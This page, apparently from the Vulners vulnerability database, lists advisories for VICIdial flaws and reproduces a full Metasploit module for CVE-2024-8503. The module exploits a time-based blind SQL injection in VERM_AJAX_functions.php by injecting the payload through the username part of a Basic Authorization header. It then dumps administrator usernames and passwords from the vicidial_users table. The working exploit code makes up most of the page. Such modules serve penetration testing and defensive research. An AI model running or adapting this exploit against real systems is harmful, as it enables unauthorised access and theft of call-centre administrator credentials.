| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| VICIdial 2.14-917a SQL Injection Vulnerability | 11 Sep 202400:00 | – | zdt | |
| VICIdial 2.14-917a Remote Code Execution Vulnerability | 11 Sep 202400:00 | – | zdt | |
| VICIdial Authenticated Remote Code Execution Exploit | 1 Oct 202400:00 | – | zdt | |
| Exploit for CVE-2024-8504 | 14 Sep 202406:27 | – | githubexploit | |
| Exploit for CVE-2024-8503 | 29 Apr 202609:13 | – | githubexploit | |
| The vulnerability in the VERM_AJAX_functions.php script of the software for managing call centers allows a violator to execute arbitrary code. | 26 Feb 202500:00 | – | bdu_fstec | |
| CVE-2024-8503 | 10 Sep 202422:37 | – | circl | |
| VICIdial SQL注入漏洞 | 10 Sep 202400:00 | – | cnnvd | |
| CVE-2024-8503 | 10 Sep 202419:22 | – | cve | |
| CVE-2024-8503 VICIdial Unauthenticated SQL Injection | 10 Sep 202419:22 | – | cvelist |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Vicidial SQL Injection Time-based Admin Credentials Enumeration',
'Description' => %q{
This module exploits a time-based SQL injection vulnerability in VICIdial, allowing attackers
to dump admin credentials (usernames and passwords) via SQL injection.
},
'Author' => [
'Valentin Lobstein', # Metasploit Module
'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt'],
['CVE', '2024-8503']
],
'DisclosureDate' => '2024-09-10',
'DefaultOptions' => {
'SqliDelay' => 1,
'VERBOSE' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path of the VICIdial instance', '/']),
OptInt.new('COUNT', [true, 'Number of records to dump', 1])
]
)
end
def run
print_status('Checking if target is vulnerable...')
setup_sqli
return print_error('Target is not vulnerable.') unless @sqli.test_vulnerable
print_good('Target is vulnerable to SQL injection.')
columns = ['User', 'Pass']
data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])
table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 4, 'Columns' => columns)
data.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :password,
private_data: user[1],
service_name: 'VICIdial',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good('Dumped table contents:')
print_line(table.to_s)
end
def setup_sqli
@sqli = create_sqli(
dbms: MySQLi::TimeBasedBlind,
opts: { hex_encode_strings: true }
) do |payload|
random_username = Rex::Text.rand_text_alphanumeric(6, 8)
random_password = Rex::Text.rand_text_alphanumeric(6, 8)
username = "#{random_username}', '', (#{payload}));# "
credentials = "#{username}:#{random_password}"
credentials_base64 = Rex::Text.encode_base64(credentials)
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'VERM', 'VERM_AJAX_functions.php'),
'vars_get' => { 'function' => 'log_custom_report' },
'headers' => {
'Authorization' => "Basic #{credentials_base64}"
}
})
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation